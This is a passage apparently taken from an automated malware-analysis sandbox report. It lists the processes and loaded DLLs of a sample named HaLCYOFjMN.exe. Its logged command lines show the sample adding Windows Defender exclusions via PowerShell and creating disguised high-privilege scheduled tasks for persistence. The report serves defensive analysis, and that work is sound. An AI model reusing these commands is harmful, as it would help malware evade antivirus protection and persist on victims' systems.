                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\agentwebreviewDhcp\uk12ZF.vbe"
                                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Update.exe C:\Users\user\AppData\Roaming\Update.exe
                                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Update.exe "C:\Users\user\AppData\Roaming\Update.exe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\agentwebreviewDhcp\fSi1yDkwZTtB7t90YnI.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\agentwebreviewDhcp\portBrowserweb.exe "C:\agentwebreviewDhcp/portBrowserweb.exe"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Mail\System.exe'" /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\System.exe'" /rl HIGHEST /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Mail\System.exe'" /rl HIGHEST /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES158C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP"
                                    Source: unknownProcess created: C:\Program Files\Windows Mail\System.exe "C:\Program Files\Windows Mail\System.exe"
                                    Source: unknownProcess created: C:\Program Files\Windows Mail\System.exe "C:\Program Files\Windows Mail\System.exe"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1BB6.tmp" "c:\Users\user\AppData\Roaming\CSC2223B829CAD74E6CA36F406352D1401D.TMP"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1F7E.tmp" "c:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ybWXCCKXKhIvlNpBF" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 11 /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ybWXCCKXKhIvlNpBF" /sc ONLOGON /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 7 /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\agentwebreviewDhcp\WmiPrvSE.exe'" /f
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'HaLCYOFjMN.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Update.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe"Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Users\user\AppData\Local\Temp\rqbprm.exe "C:\Users\user\AppData\Local\Temp\rqbprm.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Users\user\AppData\Local\Temp\cnvwov.EXE "C:\Users\user\AppData\Local\Temp\cnvwov.EXE" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\agentwebreviewDhcp\uk12ZF.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\agentwebreviewDhcp\fSi1yDkwZTtB7t90YnI.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\agentwebreviewDhcp\portBrowserweb.exe "C:\agentwebreviewDhcp/portBrowserweb.exe"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES158C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1BB6.tmp" "c:\Users\user\AppData\Roaming\CSC2223B829CAD74E6CA36F406352D1401D.TMP"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1F7E.tmp" "c:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP"
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: avicap32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: msvfw32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
